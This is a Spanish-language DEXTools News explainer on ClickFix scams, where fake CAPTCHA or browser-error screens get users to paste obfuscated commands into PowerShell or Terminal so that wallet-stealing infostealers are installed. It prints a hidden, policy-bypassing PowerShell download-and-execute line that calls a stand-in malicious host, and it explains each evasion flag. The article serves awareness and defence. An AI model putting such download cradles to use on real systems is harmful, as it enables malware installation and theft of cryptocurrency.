Estafas criptográficas de ClickFix: CAPTCHA falsos que roban billeteras

— By Boni in Tutorials

Estafas criptográficas de ClickFix: CAPTCHA falsos que roban billeteras

El phishing ha evolucionado más allá de las páginas de inicio de sesión falsas básicas. Analizamos la ingeniería social y la mecánica de ejecución de terminales detrás de los ataques de drenaje de cifrado de ClickFix.


CAPTCHA falsos y robo de billetera criptográfica ClickFix

  • La aparición de Estafas criptográficas de ClickFix evita por completo estos cortafuegos mentales tradicionales. En lugar de intentar engañarlo para que firme una transacción maliciosa en cadena o escriba sus claves privadas en un formulario de phishing, los ataques ClickFix explotan la relación operativa entre un usuario y su sistema operativo local. Al presentar errores de navegador artificiales muy convincentes y pantallas de verificación CAPTCHA falsas, estos ataques engañan a los usuarios para que copien y peguen scripts cifrados directamente en las terminales de su sistema local.
  • Los vectores que rigen el robo de activos digitales han pasado del engaño pasivo a la explotación agresiva de terminales impuesta por el usuario. Durante años, el manual básico de defensa para finanzas descentralizadas Los participantes de (DeFi) se centraron en gran medida en interceptar páginas de inicio de sesión falsas, auditar firmas de aprobación de contratos inteligentes y proteger frases iniciales sin procesar contra entradas maliciosas. Si un asignador mantenía el hábito disciplinado de verificar las URL y revisar cuidadosamente las pantallas de confirmación de la billetera de hardware, su capital en cadena permanecía estructuralmente aislado.
  • El navegador web no falló; La cautela de la víctima se hizo bajo presión. Esta guía desglosa los trucos de ingeniería social, la mecánica de la línea de comandos y los bucles de exfiltración que definen la arquitectura ClickFix.
ClickFix crypto scams expose users to fake CAPTCHAs that steal digital wallets, highlighting new phishing tactics.


1. La psicología de la trampa: la interfaz CAPTCHA falsa

  • Para analizar un ataque ClickFix con precisión técnica, primero debe reconocer que comienza como una pura jugada de ingeniería social. El ataque generalmente se manifiesta cuando un usuario visita un blog Web3 comprometido, una interfaz de protocolo duplicada o un portal de seguimiento falso.

En lugar de presentar un mensaje obvio de conexión de billetera, la página activa un bloqueo mecánico inmediato.

  • La pantalla muestra una ventana interactiva muy pulida que imita una verificación de seguridad estándar, como el torniquete de Cloudflare, un bucle reCAPTCHA v3 de Google o una alerta de falla crítica de actualización del navegador (por ejemplo, "Error de actualización de Chrome: falla de ingestión de Direct3D").
  • Cuando el usuario intenta completar la verificación, la interfaz muestra una notificación específica que indica que la verificación automática falló debido a un conflicto de representación localizado. Luego, la pantalla proporciona una "solución manual" paso a paso.
  • Al inventar un problema técnico urgente, la estafa cambia el estado psicológico de la víctima de un consumidor defensivo a un técnico de resolución de problemas, lo que los hace mucho más dispuestos a seguir comandos inusuales de la computadora.

2. El canal de ejecución de comandos: del portapapeles a la terminal

  • El verdadero peligro de la metodología ClickFix es su capacidad de eludir por completo la seguridad del espacio aislado a nivel del navegador. Los navegadores web están diseñados para evitar que códigos de Internet que no sean de confianza manipulen directamente el hardware de su computadora o ejecuten aplicaciones de software en segundo plano.
  • ClickFix evade esta barrera engañando el usuario actúa como puente que lleva el software malicioso más allá de los muros de seguridad del navegador.

La Mecánica de Inyección Paso a Paso

  • Paso 1: El secuestro del portapapeles: La ventana emergente de verificación falsa le indica al usuario que haga clic en un botón llamado "Copiar código de corrección" o "Copiar token de verificación". Cuando se hace clic, el JavaScript del sitio web copia una cadena de comando maliciosa oculta directamente en el portapapeles del sistema del usuario.

  • Paso 2: Atajos de ingesta de terminal: La interfaz presenta instrucciones gráficas claras que indican al usuario que abra la utilidad de comando nativa de su sistema operativo. Para los usuarios de Windows, les indica que presionen Windows Key + R para invocar la ventana Ejecutar, escriba cmd o powershelly presione enter. Para los usuarios de macOS, les indica que abran la aplicación Terminal nativa mediante la búsqueda de Spotlight.

  • Paso 3: El activador de pegado: Las instrucciones indican al usuario que haga clic derecho dentro de la ventana de terminal abierta o presione Ctrl + V (o Cmd + V en Mac) para pegar la "cadena de verificación copiada" y presione ejecutar.

3. Deconstrucción de la carga útil: el exploit Base64 PowerShell

Cuando la víctima pega la cadena copiada en su terminal, no está pegando una clave de verificación inofensiva. Están ejecutando una cadena de comando altamente comprimida, ofuscada y frecuentemente codificada en Base64 diseñada para activar un bucle de descarga silencioso.

Una carga útil típica del comando ClickFix dirigida a sistemas Windows utiliza herramientas de utilidad PowerShell estándar para extraer un archivo de malware de segunda etapa desde un servidor remoto:

PowerShell
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_Obfuscate

Cuando el sistema lo descodifica, este comando en segundo plano se traduce en un agresivo script de descarga automatizada:

PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')

La matriz de explotación del sistema

Parámetro del terminalPropósito de Cumplimiento del SistemaObjetivo de explotación maliciosa
-NoP (Sin perfil)Impide que el terminal cargue perfiles de usuario personalizados.Acelera la velocidad de ejecución y omite las alertas de perfil localizadas.
-NonI (No interactivo)Desactiva las indicaciones interactivas o los mensajes de confirmación.Garantiza que el script se ejecute completamente en segundo plano sin necesidad de intervención del usuario.
-W Hidden (Estilo de ventana oculto)Fuerza la ejecución del terminal a ejecutarse en un estado invisible.Oculta la actividad de descarga desde la vista del escritorio para evitar alertar a la víctima.
-Exec BypassAnula las restricciones de ejecución predeterminadas del sistema.Deshabilita explícitamente las configuraciones de seguridad que impiden la ejecución de scripts no autorizados.
IEX (Invocar-Expresión)Evalúa y ejecuta cualquier expresión de cadena como un comando local.Descarga y ejecuta instantáneamente la carga útil de robo de billetera directamente en la memoria activa.

4. Lo que se roba: la carga útil de Wallet Infostealer

  • Una vez que la carga útil de la segunda etapa se ejecuta dentro de la memoria de su sistema, implementa una clase de utilidad especializada conocida como Ladrón de información (Infostealer), como Lumma Stealer, Vidar o Medusa. Este malware no se dirige a sus documentos generales ni a su historial de búsqueda; está diseñado con precisión para atacar su huella de activos digitales.
  • Infostealer apunta mediante programación a los directorios de carpetas locales donde los navegadores web almacenan extensiones y archivos de estado de las aplicaciones. Raspa activamente el .ldb y .log mapas de datos que pertenecen a extensiones Web3 populares como MetaMask, Phantom, Coinbase Wallet y Rabby.

Estos archivos locales albergan las claves cifradas de la bóveda de su billetera. De manera simétrica, el malware extrae cookies del navegador y tokens de sesión activa.

  • Todos estos datos extraídos se empaquetan en un archivo comprimido y se envían instantáneamente a través de un canal cifrado al servidor del atacante. Una vez que los piratas informáticos poseen estos tokens de sesión y bóvedas locales, pueden forzar las contraseñas de su billetera fuera de línea o secuestrar sus sesiones activas, agotando todos los activos de toda su cartera de cadenas múltiples en cuestión de minutos.

5. Por qué fallan las protecciones de seguridad tradicionales

La razón principal por la que las estafas criptográficas de ClickFix logran una alta tasa de éxito es que eluden sistemáticamente las herramientas antivirus estándar y las extensiones de navegador web.

El vacío legal de seguridad estructural: Debido a que el sitio web malicioso no fuerza físicamente la descarga de un .exe o .dmg a través de los canales estándar del navegador, los sistemas de defensa del navegador no ven ningún riesgo. El usuario es quien copia el texto y abre manualmente la terminal de su sistema.

Desde la perspectiva del sistema operativo, abrir PowerShell o Terminal y ejecutar un comando administrativo es una actividad rutinaria y privilegiada autorizada explícitamente por el propietario de la computadora. Debido a que el código a menudo se ejecuta directamente dentro de la memoria activa sin guardar archivos ejecutables pesados ​​y no verificados en el disco duro local, el software antivirus básico basado en firmas frecuentemente no detecta la actividad hasta que el ciclo de exfiltración de datos ya ha concluido.

6. Estrategias de protección en cadena y telemetría a través de DEXTools

  • Defenderse contra las amenazas modernas de ingeniería social requiere mantener límites estrictos alrededor de la terminal de su sistema, junto con visibilidad en tiempo real de los movimientos en vivo en la cadena. Si sospecha que la configuración de un activo se ha visto comprometida por una posible violación de robo de información local, el único método para preservar el capital restante es rastrear los registros de datos de la billetera activa y auditar los permisos de contratos pendientes en lugares descentralizados.
  • DEXTools proporciona la infraestructura de datos analíticos críticos necesaria para monitorear la actividad de los tokens y la estabilidad de la billetera en múltiples redes de capa 1 y capa 2. Al utilizar exploradores de pares en tiempo real, seguimiento de transacciones multicadena y auditorías de seguridad de contratos de tokens, los participantes del mercado pueden verificar de forma independiente si se manifiestan en la cadena interacciones inesperadas de billeteras o transferencias de fondos sospechosas.

Puedes acceder a DEXTools aquí ¡y comience a operar hoy!

Explicación de los ataques de drenaje de billetera: cómo reconocerlos y evitarlos Lista de verificación de seguridad de Wallet: 10 pasos imprescindibles antes de guardarla Principales herramientas de seguridad de tokens en 2026: comprobaciones de estafas, auditorías y revisiones de riesgos Estafas de TON Wallet Drainer: cómo mantenerse seguro

Descargo de responsabilidad: Este artículo tiene fines informativos únicamente y no constituye asesoramiento de inversión, asesoramiento financiero, asesoramiento comercial ni ningún otro tipo de asesoramiento. DEXTools no recomienda comprar, vender ni mantener ninguna criptomoneda o token. Los usuarios deben realizar su propia investigación y consultar con un asesor financiero calificado antes de tomar cualquier decisión de inversión. Las inversiones en criptomonedas son volátiles y de alto riesgo. DEXTools no es responsable de las pérdidas incurridas.

Originally published by DEXTools News. © 2026 DEXTools News (STRADEXT DEFI SOLUTIONS, S.L.). Reproduction or republication without written permission is prohibited.